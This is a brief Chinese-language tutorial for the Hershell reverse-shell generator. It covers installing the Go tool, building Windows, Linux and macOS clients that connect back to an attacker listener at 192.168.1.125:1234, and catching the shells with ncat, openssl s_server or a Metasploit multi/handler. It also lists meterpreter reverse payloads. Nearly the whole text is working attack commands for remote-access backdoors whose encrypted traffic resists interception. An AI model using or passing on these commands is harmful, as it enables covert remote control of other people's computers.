0x01 简介
Hershell 是一款 go 语言编写的多平台反向 shell 生成器,使用 tls 加密流量,并提供证书公钥指纹固定功能,防止流量拦截。
0x02 安装及配置
因为是第一次接触go,相应不同环境请自行摸索:
Linux:
apt-get install golang
cd /home/admin/
git clone https://github.com/lesnuages/hershell.git
mkdir go
export GOPATH=/home/admin/go/
go get github.com/lesnuages/hershell
export PATH=$PATH:/home/admin/go/bin
0x03 操作使用
1.生成证书
make depends
以 windows 为例,生成一个客户端,其他平台同理:
make windows64 LHOST=192.168.1.125 LPORT=1234
$ ls
hershell.exe hershell.go Makefile README.md Dockerfile server.pem LICENSE meterpreter server.key shell
可生成多平台的客户端:
For windows:
# Predifined 32 bit target
$ make windows32 LHOST=192.168.1.125 LPORT=1234
# Predifined 64 bit target
$ make windows64 LHOST=192.168.1.125 LPORT=1234
For Linux:
# Predifined 32 bit target
$ make linux32 LHOST=192.168.1.125 LPORT=1234
# Predifined 64 bit target
$ make linux64 LHOST=192.168.1.125 LPORT=1234
For Mac OS X
$ make macos LHOST=192.168.1.125 LPORT=1234
2.开启监听
可以使用如下程序监听:
#socat
#ncat
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
#openssl server module
$ openssl s_server -cert server.pem -key server.key -accept 1234
#metasploit multi handler (with a python/shell_reverse_tcp_ssl payload)
$ use exploit/multi/handler
$ set HandlerSSLCert ./server.pem
$ exploit -j
[hershell]> meterpreter https 192.168.1.125:8443
msf可支持的有效payload为(仅windows平台):
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_http
windows/x64/meterpreter/reverse_http
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https
3.运行客户端
#cmd
$ hershell.exe
#bash
$ ./hershell.go
0x04 参考链接
https://github.com/sysdream/hershell
https://github.com/sysdream/hershell/issues/2